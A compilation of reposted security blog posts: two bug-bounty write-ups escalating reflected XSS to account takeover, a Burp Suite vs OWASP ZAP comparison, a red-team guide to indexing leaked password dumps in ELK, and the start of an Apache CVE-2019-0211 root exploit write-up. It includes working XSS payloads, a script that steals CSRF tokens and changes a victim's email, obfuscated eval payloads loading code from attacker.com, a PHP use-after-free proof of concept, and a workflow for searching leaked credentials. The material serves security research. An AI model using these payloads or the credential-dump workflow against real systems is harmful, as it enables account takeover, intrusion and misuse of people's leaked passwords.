Escalating XSS to Account Takeover

Escalating XSS to Account Takeover

Original text by Aditya Verma

Hey guys, this writeup is about my first Reflected XSS and how I escalated it to account takeover.

I read many Bug Hunters implying on the fact that don’t submit a simple XSS, try to escalate it. I also would tell you to escalate as much as you can, if you give them a XSS and tell what a person can do with it, it does not shows the amount of impact as you would be able to show when you prove with how it would be done; this will increase the severity as well as your payout.

So, I was hunting on a subdomain of a private program say sub.example.com, I had been looking over this subdomain for few days and had understood almost every thing about how the things are working and what a simple person(normal account) can do.Now, I started looking for other files (which are directly not linked)in various directories of the site by directory and files fuzzing using FFUF. I found a file that looked interesting as it was a page to register (let’s name it sub.example.com/fakepath/register) and the main page that opened when someone clicked for registration was sub.example.com/fakepath/registration.

Confused Jon Stewart GIF - Find & Share on GIPHY

Now this felt like maybe this page was used earlier and then they changed things.So, as you must know that old and forgotten pages have more chances of bugs.

I ran Arjun to check for any hidden parameters and luckily found a few parameters that were being reflected back on the page.Out of those parameters 2 of them were filling in the input fields of the registration form.I send the request with first parameter and it filled the value supplied thorugh URL into the city input field.Sent the request to Burpsuite Repeater and tried basic XSS inputs.Sadly, it got html encoded ; I tried single URL encoding and double URL encoding, none worked and which made me move on to check other paratmeters.

Baby Reaction GIF - Find & Share on GIPHY

After trying almost every parameter recieved from Arjun I came back to the repeater tab of the earlier one, and just randomly gave another try with Triple URL encoding and guess what the quote(“) character passed on.

Happy You Good GIF - Find & Share on GIPHY

Made a simple payload to check sub.example.com/fakepath/register?i=aditya%252522+onmouseover=alert(1)+x=%252522sI added x parameter at last to balance the quote that is being added by system. Hovered on city input field and it popped out. I checked on other parameter that was being reflected in another input field and it was also vulnerable to similar payload.I also noticed that the registration and register page are almost similar and gave a try on registration and yes both parameters were vulnerable at that page also.

Reported the Bug as medium severity and came back. Now, got the thought that try to escalate it as other people say.I was at first reluctant but since I had already checked for CSRF on various forms like edit account and much I thought since this can execute script why not fetch the account edit page with javascript which will come with CSRF token(in this case tokens) and then send the data back with email changed.

This took some time as I am not much of a developer but short time ago I had done a project with nodeJS. With little earlier familarity and lot googling I somehow put the jigsaw pieces aligned and the script was ready(I created this script on Firefox developer tools; Just incase anyone wanna know how to do it, the console panel allows running of javascript on webpage as it would have come along with the page).Hosted the script locally and used ngrok to create a tunnel to localhost.Used the following payload sub.example.com/fakepath/register?i=aditya%252522+/%25253e%25253cscript+src%3d%252522https://my_ngrok_url/script.js%252522%25253e%25253c/script%25253e

Here is the script:

let name=[];
let value=[];
fetch('https://sub.example.com/fakepath/accountchange.php?update=1')
.then(function(response) {
return response.text()
}).then(function (html) {// Convert the HTML string into a document object
var parser = new DOMParser();
var doc = parser.parseFromString(html, 'text/html');
//var forms=doc.forms[0];
//console.log(doc);
var element = doc.querySelectorAll('input[type="hidden"]');
//var name=[];
//var value=[];
for(var i=0; i<element.length;i++){
name.push(element[i].name);
value.push(element[i].value);
}
console.log(name,value,"\n");
}).catch(function (err) {
// There was an error
console.warn('Something went wrong.', err);
});
//////////////////////////////////////////////////////////////////////
function sendData( data ) {
const XHR = new XMLHttpRequest(),
FD = new FormData();
console.log(name,value);
// Push our data into our FormData object
for(var i=0;i<7;i++) {
console.log(FD);
FD.append( name[i],value[i] );
}
FD.append('lastname','a');
FD.append('name',"test");
FD.append('email','hellrider9+1@wearehackerone.com');
FD.append('Sumbit','Sumbit');
// Define what happens on successful data submission
XHR.addEventListener( 'load', function( event ) {
alert( 'Yeah! Data sent and response loaded.' );
} );// Define what happens in case of error
XHR.addEventListener(' error', function( event ) {
alert( 'Oops! Something went wrong.' );
} );// Set up our request
XHR.open( 'POST', 'https://sub.example.com/fakepath/accountchange.php?update=1' );// Send our FormData object; HTTP headers are set automatically
XHR.send( FD );
}setTimeout(sendData,7000);

If anyone wanna understand the code then you can directly contact me through Twitter, my handle is 0cirius0.

Coming back now this Reflected XSS became a high severity Account Takeover.

Weaponizing XSS For Fun & Profit

Weaponizing XSS For Fun & Profit

Original text by Saad Ahmed

Hi Folks! hope you all doing good so I am back with another amazing way of bypassing the WAF which is blocking me from weaponizing the XSS, Without wasting any time let get started.

The XSS part is very simple my input is reflecting inside the HREF in <a> e.g <a href=”https://example.com/home/leet”>Home</a>

Escaping from href is very simple my payload leet” onmouseover=alert(1)” now when I move my mouse over the link the XSS is popup this is very simple & basic.

It’s time to do something BIG!!! Now I am checking all the endpoints of the WebApp that disclosing the sensitive information which I can steal from XSS and show to impact to the TEAM, so after checking all the request I came to know that on every request there is CSRF TOKEN header is present, so I need to steal that token and then need to send the request using fetch to weaponize the XSS.

I tried to remove the CSRF TOKEN from the request & bang!! the request is sent without any error & the Account information is UPDATED. But when i tried to reproduce this by creating the HTML FORM the server give 403 missing CSRF TOKEN, after checking the request the matching all the headers I came to know that the dev done some short work ( JUGAR ) to prevent from CSRF is by checking the REFERER HEADER. If the request comes from example.com then they accept it else they give 403 with missing CSRF TOKEN.

I already have XSS so don’t need to worry about the Referer ✌️Simple send the below JQUERY POST req from the console just to verifying it & it worked.

$.post(“https://example.com/account/update_info/»,{name: “Account Update”},function(data,status){alert(“Data: “ + data + “\nStatus: “ + status);});

so my final payload that update the account information is.

leet” onmouseover=’$.post(`https://example.com/account/update_info/`,{name: `Account Update`},function(data,status){alert(`Data: ` + data + `Status: ` + status);});
‘“

The payload didn’t work. nowhere the SERVER is doing something bad the server is replacing the . with _ e.g example.com becomes example_com. I tried everything here encoding etc but didn’t work, so my mind clicked why not I simply call the JS file from the server but again I need to put my server URL which also contains the & the document.createElement() is also contain .

Image for post

for those who dont know we can also used the document.createElement() without . like this document[‘createElement’](‘script’)

Image for post

so the final code that call the JSCODE from attacker server is

document[‘createElement’](‘script’);a[‘setAttribute’](‘src’,’attacker.com/x.js’);document[‘head’][‘appendChild’](a);

String[‘fromCharCode’](100,111,99,117,109,101,110,116,91,39,99,114,101,97,116,101,69,108,101,109,101,110,116,39,93,40,39,115,99,114,105,112,116,39,41,97,91,39,115,101,116,65,116,116,114,105,98,117,116,101,39,93,40,39,115,114,99,39,44,39,97,116,116,97,99,107,101,114,46,99,111,109,47,120,46,106,115,39,41,59,100,111,99,117,109,101,110,116,91,39,104,101,97,100,39,93,91,39,97,112,112,101,110,100,67,104,105,108,100,39,93,40,97,41)

convert the creating the script tag into charCode beacase the server contain .

Image for post

When I Execute this from XSS the server encoding the [ ]. Sobypassing of . is useless 😠 I tried everything here bypassing the [ ] but nothing works. One of my friend told you can call script from SERVER without . & [ ] I was like tell me bruhh howww!!!

with(String){eval(fromCharCode(97,108,101,114,116,40,49,41))}

so we can use with and the return value of fromCharCode inside the eval to execute the string no need of . & [ ]

Image for post

The Final payload look like this

$.post(“https://example.com/account/update_info/»,{name: “Account Update”},function(data,status){alert(“Data: “ + data + “\nStatus: “ + status);});

converted into charCode

put he charCode value in the code look like this

with(String){eval(fromCharCode(36,46,112,111,115,116,40,34,104,116,116,112,115,58,47,47,109,105,120,112,97,110,101,108,46,99,111,109,47,97,99,99,111,117,110,116,47,117,112,100,97,116,101,95,110,97,109,101,47,34,44,123,101,109,97,105,108,58,32,34,115,104,103,51,51,107,64,103,109,97,105,108,46,99,111,109,34,125,44,102,117,110,99,116,105,111,110,40,100,97,116,97,44,115,116,97,116,117,115,41,123,99,111,110,115,111,108,101,46,108,111,103,40,34,68,97,116,97,58,32,34,32,43,32,100,97,116,97,32,43,32,34,92,110,83,116,97,116,117,115,58,32,34,32,43,32,115,116,97,116,117,115,41,59,125,41,59))}

Image for post

urlEncoded the above code and the final payload become

https://example.com/home/leet” onmouseover=’URLENCODED PAYLOAD’ “

send the above link to anyone & you can update his account, delete the account and many more action

The Program paid $400 for XSS and told me to submit new report for CSRF issue and they paid $1800 for CSRF and the TOTAL IS $2200

Image for post

This whole bypass and upgrading process done in 3 Days 🙌. I hope you guys learn something new here

./LOGOUT

Burp Suite vs OWASP ZAP – a Comparison series

Burp Suite vs OWASP ZAP – a Comparison series

Original text by Jaw33sh

Burp Suite {Pro} vs OWASP ZAP! Does more expensive mean better?

In this post, I would like to document some of the differences between the two most renowned interception proxies used by penetration testers as well as DevSecOps teams around the globe.

:::DISCLAIMER:::

I am no expert in both tools; however, I have used them enough to feel good about documenting their features in this post. Please comment if you see an error or you want to point something I missed.

Introduction

Both OWASP ZAP and Burp Suite are considered intercepting proxies (on steroids) that sits between the browser and the webserver to intercept and manipulate requests exchange.

OWASP ZAP is a free and open-source project actively maintained by volunteers while Burp Suite is a commercial Product maintained and sold by PortSwigger, They have been selected almost on every top 10 tools of the year, and in this post, I will compare version 2020.x of burp suite which saw the first release on January 2020.

We can see since they emerged to the market, they are gaining more and more momentum and users as we see in google trends for the past 5 years (2015-2020). Hopefully, by the end of this post, you will get a better understanding of their similarities and differences.

Trends between 2015 and 2020
Google Trends showing Burp suite in blue and OWASP ZAP in Red

I will discuss the differences between both tools in regards to the following aspects:

  1. Describing the User Interface
  2. Listing capabilities and features for both tools
  3. Personal User Experience with each one of them
  4. Pros and Cons of each tool 

1. User Interface

The user interface can be frustrating when you first see it. Still, after a while, it gets intuitive and has all the necessary info you need to know. Both tools have 6 simple items in their interface.

Burp Suite has a simple interface consisting of 6 simple windows.

Burp Suite 2020.2.1 User Interface
  1. Menu Bar – Provides navigation menus and tools settings
  2. Tabs Bar -Provides most of the functionality of burp in simple tabs
  3. Status Bar – Provides information for memory and disk space used by burp (new handy feature)
  4. Event Log – Provides a log for Burp Suite containing additional information
  5. Issues and Vulnerabilities window – Provides a list of detected vulnerabilities and is Active on a paid version of Burp Suite Pro or Enterprise
  6. Tasks menu – Provides simple information and control over current running, paused and finished tasks

while Zap has a simple interface consisting of also 6 simple items

ZAP 1.8.0 user interface Source: https://www.zaproxy.org/getting-started/
  1. Menu Bar – Provides access to many of the automated and manual tools.
  2. Toolbar – Includes buttons that provide easy access to most commonly used features.
  3. Tree Window – Displays the Sites tree and the Scripts tree.
  4. Workspace Window – Displays requests, responses, and scripts and allows you to edit them.
  5. Information Window – Displays details of the automated and manual tools.
  6. Footer – Displays a summary of the alerts found and the status of the main automated tools.

2. Capabilities

Both burp suite and Zap have good sets of capabilities; however, at some, a tool can excel more than the other, we will get to each one further down in separate posts.

  • Intercepting feature with SSL/TLS support and web sockets.
  • Interception History.
  • Tree navigation for scope.
  • Scope definition.
  • Manual request editor and sender.
  • Plugins, Extensions, and Marketplace/Store.
  • Vulnerability tree or Issues display.
  • Fuzzer capabilities with default lists.
  • Scan Policy configuration.
  • Report generation capability.
  • Encoders and Decoders.
  • Spider function.
  • Auto check for Update features.
  • Save and Load Project files.
  • Exposed and usable APIs .
  • Passive and Active scan engine.
  • Session Token entropy Analysis (Burp Only if you know that ZAP support this even with Addons please leave a comment).
  • Knowledge Base (Burp only, as ZAP does not support that in the UI).
  • Diff-like capability or comparison feature (Burp only AFAIK no support out of the box for ZAP).
  • Support for multiple programming and scripting languages.
  • Authentication Modules like NTLM, form authentication, and so on.

I might have missed some features so please if you know a feature I missed, please comment below.

3. User experience

A while back, I had to use both tools for comparison, While I am used to Burp Suite more from the first look, OWASP ZAP does the same functionality but has to be enhanced with plugins. keep in mind there is an easy learning curve for both.
For example, ZAP has one fuzzer window, which makes it harder to search in fuzzer results, especially when you run multiple fuzzers. At the same time, burp has different windows and configuration for each fuzz conducted. the same goes for other features.
Unlike Burp, You can’t change (add, edit or remove) HTTP headers in ZAP fuzzer window. That gives Burp an edge because it allows you to sort or search in fuzzing results faster and effectively.

zap fuzzer
Zap 2.8.0 Fuzzer window
burp fuzzer configuratability
Burp 2020.2.1 Fuzzer window

which one do you find intuitive?

One big plus for Burp is the Comparer tab, it allows for easier change detection. Like detecting differences in size from time change or tokens and content, ZAP lacks this feature without extensions (comment bellow which ZAP plugin does that).

quickly compare request or response

Another hurdle in ZAP is the ability to search for text in the request or server response, unlike Burp, which makes it more accessible. You can search for text or regex.

Burp Repeater makes it easier to search
Zap request Editor

One more thing that makes Burp more popular than Zap is the ability to detect token entropy and randomness for cryptography analysis. Very useful when session cookies are generated manually.

Burp Sequencer run statistics on tokens and calculates Entropy

However, One big plus for Zap is its API, which makes for easier integration or automation than Burp. You access the API from the browser or other user agents like curl or SDKs/libraries.

Burp Suite community edition API can only be used to write plugins and extensions, unlike ZAP which can be used on DevOps and/or DevSecOps pipelines.

A new Burp REST API was introduced in 2018 which makes it easier to integrate burp with other tools and workflows.

An example is using the API to spider a host and getting the results, e.g. crawling testphp.vulnweb.com from the console.

This feature makes OWASP ZAP the easiest to integrate into DevSecOps pipelines no matter how big or small is your environment.

ZAP API in action

For a while, Only OWASP had good resources to learn about ZAP and web application security, but recently PortSwigger also launched a very good free Web Security academy

4. Cons and Pros of each other

In my experience, ZAP is good when it comes to DevOps/DevSecOps for it’s easier API integration and support. At the same time, Burp is more oriented towards actual vulnerability assessment and penetration testing of web applications.

At the different price points for each tool, it is up to your scenario to decide if more expensive is better. Burp Pro is priced by PortSwigger at 399 USD per user per year, While OWASP ZAP is a free and open-source project under Apache 2.0 License.

In conclusion, both tools are good in their differences and use cases. tell me which tool you like and your tips and tricks for Zap or Burp (●’◡’●)

Public password dumps in ELK

Original text by Marc Smeets

Passwords, passwords, passwords: end users and defenders hate them, attackers love them. Despite the recent focus on stronger authentication forms by defenders, passwords are still the predominant way to get access to systems. And due to the habit of end users reusing passwords, and the multitude of public leaks in the last few years, they serve as an important attack vector in the red teamer’s arsenal. Find accounts of target X in the many publicly available dumps, try these passwords or logical iterations of it (Summer2014! might very well be Winter2018! at a later moment) on a webmail or other externally accessible portals, and you may have got initial access to your target’s systems. Can’t find any accounts of your target in the dump? No worries, your intel and recon may give you private email addresses that very well may be sharing the password with the target’s counter parts.

Major public password dumps

Recently, two major password dumps got leaked publicly: Exploit.in and Leakbase (goes also by the name BreachCompilation). This resulted in many millions of username-password combinations to be leaked. The leaks come in the form of multiple text files, neatly indexed in alphabetical order for ‘quick’ lookup. But the lookup remains extremely slow, especially if the index is done on the username instead of the domain name part of the email address. So, I wanted to re-index them, store them in a way that allows for quick lookup, and have the lookup interface easily accessible. I went with ELK as it ticks all the boxes. I’ll explain in this blog how you can do the same. All code can be found on our GitHub.

A few downsides of this approach

Before continuing I want to address a few short comings of this approach:

  • Old data: one can argue that many of the accounts in the dumps are many years old and therefore not directly useful. Why go through all the trouble? Well, I rather have the knowledge of old passwords and then decide if I want to use them, then not knowing them at all.
  • Parsing errors: the input files of the dump are not nicely formatted. They contain lots of errors in the form of different encodings, control characters, inconsistent structure, etc. I want to ‘sanitize’ the input to a certain degree to filter out the most commonly used errors in the dumps. But, that introduces the risk that I filter out too much. It’s about finding a balance. But overall, I’m ok with losing some input data.
  • ELK performance: Elasticsearch may not be the best solution for this. A regular SQL DB may actually be better suited to store the data as we generally know how the data is formatted, and could also be faster with lookups. I went with ELK for this project as I wanted some more mileage under my belt with the ELK stack. Also, the performance still is good enough for me.

Overall process flow

Our goal is to search for passwords in our new Kibana web interface. To get there we need to do the following:

  1. Download the public password dumps, or find another way to have the input files on your computer.
  2. Create a new system/virtual machine that will serve as the ELK host.
  3. Setup and configure ELK.
  4. Create scripts to sanitize the input files and import the data.
  5. Do some post import tuning of Elasticsearch and Kibana.

Let’s walk through each step in more detail.

Getting the password dumps

Pointing you to the downloads is not going to work as the links quickly become obsolete, while new links appear. Search and you will find. As said earlier, both dumps from Exploit.in and Leakbase became public recently. But you may also be interested in dumps from ‘Anti Public’, LinkedIn (if you do the cracking yourself) and smaller leaks lesser broadly discussed in the news. Do note that there is overlap in the data from different dumps: not all dumps have unique data.

Whatever you download, you want to end up with (a collection of) files that have their data stored as username:password. Most of the dumps have it that way by default.

Creating the new system

More is better when talking about hardware. Both in CPU, memory and disk. I went with a virtual machine with 8 cores, 24GB ram and about 1TB of disk. The cores and memory are really important during the importing of the data. The disk space required depends on the size of the dumps you want to store. To give you an idea: storing Leakbase using my scripts requires about 308GB for Elasticsearch, Exploit.In about 160GB.

Operating system wise I went with a rather default Linux server. Small note of convenience here: setup the disk using LVM so you can easily increase the disk If you require more space later on.

Setup and configure ELK

There are many manuals for installation of ELK. I can recommend @Cyb3rWard0g’s HELK project on GitHub. It’s a great way to have the basics up and running in a matter of minutes.

git clone https://github.com/Cyb3rWard0g/HELK.git
./HELK/scripts/helk_install.sh

There are a few things we want to tune that will greatly improve the performance:

  • Disable swap as that can really kill Elasticsearch’s performance:sudo swapoff –a remove swap mounts in /etc/fstab
  • Increase the JVM’s memory usage to about 50% of available system memory:
    Check the jvm options file at /etc/elasticsearch/jvm.options and /etc/logstash/jvm.options, and change the values of –Xms and –Xmx to half of your system memory. In my case for Elasticsearch:-Xmx12g -Xms12gDo note that Elasticsearch and Logstash JVMs work independently and therefor their values together should not surpass your system memory.

We also need to instruct Logstash about how to interpret the data. I’m using the following configuration file:

root@office-elk:~# cat /etc/logstash/conf.d/passworddump2elk.conf
input {
    tcp {
        port   => 3515
        codec  => line
    }
}

filter{
   dissect {
     mapping => { "message" => "%{DumpName} %{Email} %{Password} %{Domain}" }
   }
   mutate{
      remove_field => [ "host", "port" ]
   }
}

output {
    if " _dissectfailure" in [tags] {
       file {
          path => "/var/log/logstash/logstash-import-failure-%{+YYYY-MM-dd}.log"
          codec => rubydebug
       }
   } else {
      elasticsearch{
         hosts => [ "127.0.0.1:9200" ]
         index => "passworddump-%{+YYYY.MM.dd}"
      }
   }
}

As you can see in the dissect filter we expect the data to appear in the following format:

DumpName EmailAddress Password Domain

There is a very good reason why we also want the Domain part of the email address as a separate indexable field: as red teamers you tend to search for accounts tied to specific domains/companies. Searching for <anything>@domainname is an extremely CPU expensive search to do. So, we spend some more CPU power on the importing to have quicker lookups in the end. We also store the DumpName as this might become handy in some cases. And for troubleshooting we store all lines that didn’t parse correctly using the “if ” _dissectfailure” in [tags]”.

Note: using a dissect vs a grok filter gives us a small performance increase. But if you want you can accomplish the same using grok.

Don’t forget to restart the services for the config to become active.

Sanitize and import the data

The raw data that we get form the dumps is generally speaking organized. But it does contain errors, e.g. parts of html code as password, weird long lines, multitudes of spaces, passwords in languages that we are not interested in, non printable control characters.

I’ve chosen to do the following cleaning actions in my script. It’s done with simple cut, grep, awk commands, so you can easily tune to your preference:

  • Remove spaces from the entire line
    This has the risk that you lose passwords that have a space in it. In my testing I’ve concluded that the far majority of spaces in the input files are from initial parsing or saving errors, and only a tiny fraction could perhaps be a (smart) user that had a space in the password.
  • Convert to all ASCII
    You may find the most interesting character set usage in the dumps. I’m solely interested in full ASCII. This is a rather bold way to sanitize that works for me. You may want to do differently.
  • Remove non-printable characters
    Again you may find the most interesting characters in the dumps. During my testing I kept encountering control characters that I never even heard about. So I decided to remove all non-printable all together. But whatever you decide to change, you really want to get rid of all the control characters.
  • Remove lines without proper email address format
    This turns out to be a rather efficient way of cleaning. Do note that this means that the occasional username@gmail..com will also be purged.
  • Remove lines without a colon, empty username or empty password
    In my testing this turned out to be rather effective.
  • Remove really long lines (60+ char)
    You will purge the occasional extremely long email addresses or passwords, but in my testing this appeared to be near 0. Especially for corporate email addresses where most of the times a strict naming policy is in place.
  • Remove Russian email addresses (.ru)
    The amount of .ru email addresses in the dumps, and the rather unlikely case that it may be interesting, made me purged them all together. This saves import time, lookup time and a considerable amount of disk space.

After the purging of irrelevant data, we still need to reformat the data in a way that Logstash can understand. I use a AWK one liner for this, that’s explained in the comments of the script. Finally, we send it to the Logstash daemon who will do the formatting and sending along to Elasticsearch.

It’s important to note that even though we rather heavily scrutinized the input data earlier on, the AWK reformatting and the Logstash importing still can filter out lines that contain errors.

Overall, we lose some data that might actually be used when sanitizing differently. When using my scripts on the Leakbase dump, you end up with 1.1 billion records in Elasticsearch while the import data roughly contains 1.4 billion records. For the Exploit.In dump its about 600 out of 800 million. It’s about finding a balance that works for you. I’m looking forward to your pull requests for better cleaning of the import data.

To kick off the whole importing you can run a command like:

for i in $(find ./BreachCompilation/data/*.txt -type f); do ./sanitizePasswordDump.sh $i LeakBase; done

The 2nd parameter (LeakBase) is the name I give to this dump.

Don’t be surprised if this command takes the better part of a day to complete, so run it in a screen session.

Post import tuning

Now that we are importing data to Elasticsearch, there is a small performance tuning that we can do: remove the indexing of the ‘message’ field. The message field contains the entire message that was received via Logstash. An index requires CPU power and uses (some) disk space. As we already index the sub-fields this is rather useless. You can also choose to not store it at all. But the general advice is to keep it around. You may never know when it becomes useful. With the following command we keep it, but we remove the indexation.

curl -XPUT http://localhost:9200/_template/passworddump_template -d '
{
 "template" : "passworddump-*",
 "mappings" : {
  "logs": {
   "properties" : {
    "message" : {
    "type":"text", "store":"yes", "index":"false", "fields":{"keyword":{"type":"keyword","ignore_above":256}}
    }
   }
  }
 }
}'

Now the only thing left to do is to instruct Elasticsearch to create the actual index patterns. We do this via the Kibana web interface:

  • click ‘Management’ and fill in the Index pattern: in our case passworddump-*.
  • Select the option ‘I don’t want to use the Time Filter’ as we don’t have any use for searching on specific time periods of the import.

Important note: if you create the index before you have altered the indexation options (previous step), your indexation preferences are not stored; its only set on index creation time.  You can verify this by checking if the ‘message’ field is searchable; it should not. If it is, remove this index, store the template again and recreate the index.

There are a few more things that can make your life easier when querying:

  1. Change advanced setting discover:sampleSize to a higher value to have more results presented.
  2. Create a view with all the relevant data in 1 shot:
    By default Kibana shows the raw message to the screen. This is isn’t very helpful. Go to ‘Discover’, expand one of the results and hit the ‘Toggle column in table’ button next to the fields you want to be displayed, e.g. DumpName, Email, Password and Domain).
  3. Make this viewing a repeatable view
    Now hit ‘Save’ in the top bar, give it a name, and hit save. This search is now saved and you can always go back to this easy viewing.
  4. Large data search script
    For the domains that have more than a few hits, or for the cases where you want to redirect it to a file for easy importing to another tool, Kibana is not the easiest interface. I’ve created a little script that can help you. It requires 1 parameter: the exact Domain search string you would give to Elasticsearch when querying it directly. It returns a list of username:password for your query.

Good luck searching!

CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation

Original text by cfreal

Escalation

2019-04-03

Introduction

From version 2.4.17 (Oct 9, 2015) to version 2.4.38 (Apr 1, 2019), Apache HTTP suffers from a local root privilege escalation vulnerability due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts (apache2ctl graceful). In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles.

The vulnerability affects mod_preforkmod_worker and mod_event. The following bug description, code walkthrough and exploit target mod_prefork.

Bug description

In MPM prefork, the main server process, running as root, manages a pool of single-threaded, low-privilege (www-data) worker processes, meant to handle HTTP requests. In order to get feedback from its workers, Apache maintains a shared-memory area (SHM), scoreboard, which contains various informations such as the workers PIDs and the last request they handled. Each worker is meant to maintain a process_score structure associated with its PID, and has full read/write access to the SHM.

ap_scoreboard_image: pointers to the shared memory block

(gdb) p *ap_scoreboard_image 
$3 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p ap_scoreboard_image->servers[0]
$5 = (worker_score *) 0x7f4a93240820

Example of shared memory associated with worker PID 19447

(gdb) p ap_scoreboard_image->parent[0]
$6 = {
  pid = 19447, 
  generation = 0, 
  quiescing = 0 '\000', 
  not_accepting = 0 '\000', 
  connections = 0, 
  write_completion = 0, 
  lingering_close = 0, 
  keep_alive = 0, 
  suspended = 0, 
  bucket = 0 <- index for all_buckets
}
(gdb) ptype *ap_scoreboard_image->parent
type = struct process_score {
    pid_t pid;
    ap_generation_t generation;
    char quiescing;
    char not_accepting;
    apr_uint32_t connections;
    apr_uint32_t write_completion;
    apr_uint32_t lingering_close;
    apr_uint32_t keep_alive;
    apr_uint32_t suspended;
    int bucket; <- index for all_buckets
}

When Apache gracefully restarts, its main process kills old workers and replaces them by new ones. At this point, every old worker’s bucket value will be used by the main process to access an array of his, all_buckets.

all_buckets

(gdb) p $index = ap_scoreboard_image->parent[0]->bucket
(gdb) p all_buckets[$index]
$7 = {
  pod = 0x7f19db2c7408, 
  listeners = 0x7f19db35e9d0, 
  mutex = 0x7f19db2c7550
}
(gdb) ptype all_buckets[$index]
type = struct prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}
(gdb) ptype apr_proc_mutex_t
apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;
    ...
}
(gdb) ptype apr_proc_mutex_unix_lock_methods_t
apr_proc_mutex_unix_lock_methods_t {
    ...
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    ...
}

No bound checks happen. Therefore, a rogue worker can change its bucket index and make it point to the shared memory, in order to control the prefork_child_bucket structure upon restart. Eventually, and before privileges are dropped, mutex->meth->child_init() is called. This results in an arbitrary function call as root.

Vulnerable code

We’ll go through server/mpm/prefork/prefork.c to find out where and how the bug happens.

  • A rogue worker changes its bucket index in shared memory to make it point to a structure of his, also in SHM.
  • At 06:25AM the next day, logrotate requests a graceful restart from Apache.
  • Upon this, the main Apache process will first kill workers, and then spawn new ones.
  • The killing is done by sending SIGUSR1 to workers. They are expected to exit ASAP.
  • Then, prefork_run() (L853) is called to spawn new workers. Since retained->mpm->was_graceful is true (L861), workers are not restarted straight away.
  • Instead, we enter the main loop (L933) and monitor dead workers’ PIDs. When an old worker dies, ap_wait_or_timeout() returns its PID (L940).
  • The index of the process_score structure associated with this PID is stored in child_slot (L948).
  • If the death of this worker was not fatal (L969), make_child() is called with ap_get_scoreboard_process(child_slot)->bucket as a third argument (L985). As previously said, bucket‘s value has been changed by a rogue worker.
  • make_child() creates a new child, fork()ing (L671) the main process.
  • The OOB read happens (L691), and my_bucket is therefore under the control of an attacker.
  • child_main() is called (L722), and the function call happens a bit further (L433).
  • SAFE_ACCEPT(<code>) will only execute <code> if Apache listens on two ports or more, which is often the case since a server listens over HTTP (80) and HTTPS (443).
  • Assuming <code> is executed, apr_proc_mutex_child_init() is called, which results in a call to (*mutex)->meth->child_init(mutex, pool, fname) with mutex under control.
  • Privileges are dropped a bit later in the execution (L446).

Exploitation

The exploitation is a four step process: 1. Obtain R/W access on a worker process 2. Write a fake prefork_child_bucket structure in the SHM 3. Make all_buckets[bucket] point to the structure 4. Await 6:25AM to get an arbitrary function call

Advantages: — The main process never exits, so we know where everything is mapped by reading /proc/self/maps(ASLR/PIE useless) — When a worker dies (or segfaults), it is automatically restarted by the main process, so there is no risk of DOSing Apache

Problems: — PHP does not allow to read/write /proc/self/mem, which blocks us from simply editing the SHM — all_buckets is reallocated after a graceful restart (!)

1. Obtain R/W access on a worker process

PHP UAF 0-day

Since mod_prefork is often used in combination with mod_php, it seems natural to exploit the vulnerability through PHP. CVE-2019-6977 would be a perfect candidate, but it was not out when I started writing the exploit. I went with a 0day UAF in PHP 7.x (which seems to work in PHP5.x as well):

PHP UAF

<?php

class X extends DateInterval implements JsonSerializable
{
  public function jsonSerialize()
  {
    global $y, $p;
    unset($y[0]);
    $p = $this->y;
    return $this;
  }
}

function get_aslr()
{
  global $p, $y;
  $p = 0;

  $y = [new X('PT1S')];
  json_encode([1234 => &$y]);
  print("ADDRESS: 0x" . dechex($p) . "\n");

  return $p;
}

get_aslr();

This is an UAF on a PHP object: we unset $y[0] (an instance of X), but it is still usable using $this.

UAF to Read/Write

We want to achieve two things: — Read memory to find all_buckets‘ address — Edit the SHM to change bucketindex and add our custom mutex structure

Luckily for us, PHP’s heap is located before those two in memory.

Memory addresses of PHP’s heap, ap_scoreboard_image->* and all_buckets

root@apaubuntu:~# cat /proc/6318/maps | grep libphp | grep rw-p
7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so

(gdb) p *ap_scoreboard_image 
$14 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p all_buckets 
$15 = (prefork_child_bucket *) 0x7f4a9336b3f0

Since we’re triggering the UAF on a PHP object, any property of this object will be UAF’d too; we can convert this zend_object UAF into a zend_string one. This is useful because of zend_string‘s structure:

(gdb) ptype zend_string
type = struct _zend_string {
    zend_refcounted_h gc;
    zend_ulong h;
    size_t len;
    char val[1];
}

The len property contains the length of the string. By incrementing it, we can read and write further in memory, and therefore access the two memory regions we’re interested in: the SHM and Apache’s all_buckets.

Locating bucket indexes and all_buckets

We want to change ap_scoreboard_image->parent[worker_id]->bucket for a certain worker_id. Luckily, the structure always starts at the beginning of the shared memory block, so it is easy to locate.

Shared memory location and targeted process_score structures

root@apaubuntu:~# cat /proc/6318/maps | grep rw-s
7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052                      /dev/zero (deleted)

(gdb) p &ap_scoreboard_image->parent[0]
$18 = (process_score *) 0x7f4a9323e020
(gdb) p &ap_scoreboard_image->parent[1]
$19 = (process_score *) 0x7f4a9323e044

To locate all_buckets, we can make use of our knowledge of the prefork_child_bucket structure. We have:

Important structures of bucket items

prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}

apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;

    ...
}

apr_proc_mutex_unix_lock_methods_t {
    unsigned int flags;
    apr_status_t (*create)(apr_proc_mutex_t *, const char *);
    apr_status_t (*acquire)(apr_proc_mutex_t *);
    apr_status_t (*tryacquire)(apr_proc_mutex_t *);
    apr_status_t (*release)(apr_proc_mutex_t *);
    apr_status_t (*cleanup)(void *);
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    apr_status_t (*perms_set)(apr_proc_mutex_t *, apr_fileperms_t, apr_uid_t, apr_gid_t);
    apr_lockmech_e mech;
    const char *name;
